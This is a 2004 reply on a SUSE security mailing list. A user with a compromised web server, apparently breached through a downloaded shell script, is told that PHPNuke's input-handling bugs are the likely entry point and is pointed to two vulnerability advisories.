[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [suse-security] Backdoor over http(s)??



Hi Mátyás,

Am Die, den 13.01.2004 schrieb Mátyás Tibor um 17:33:
> I have got in /cgi-bin/ directory:
> 
> -neomail (1.26)
> -openwebmail (2.30)
> -SuSE things
> -sanecgi
> 
> but nothing else.
> 
> And I have Phpnuke 6.9 (?? PHP ??)

Did you check PHPNuke? I wouldn't trust this piece of software further
than I can throw my Gateway bigtower case ;-)

PostNuke and PHPNuke are known to be notoriously weak when it comes to
security.

> -----
> Ok, somebody could use wget, but what about the .do.sh -->
> how was it possible, to execute it?

Without knowing anything else I'd suspect PHPNuke to be the open door.
It may contain a bug that allows to pass executable content as a
parameter. This has been the case in the past very often as the
developers of those two projects don't seem to be too concerned about
evaluating the parameters at runtime.

Have a look at this:

http://www.gulftech.org/01032004.php

or

http://www.securitytracker.com/alerts/2003/Dec/1008562.html

I really wouldn't use PostNuke or PHPNuke as there never has been any
code audit seemingly since new weaknesses based on poor programming are
discovered regularly.

just my 0.02 euro ;-)

Tobias


-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here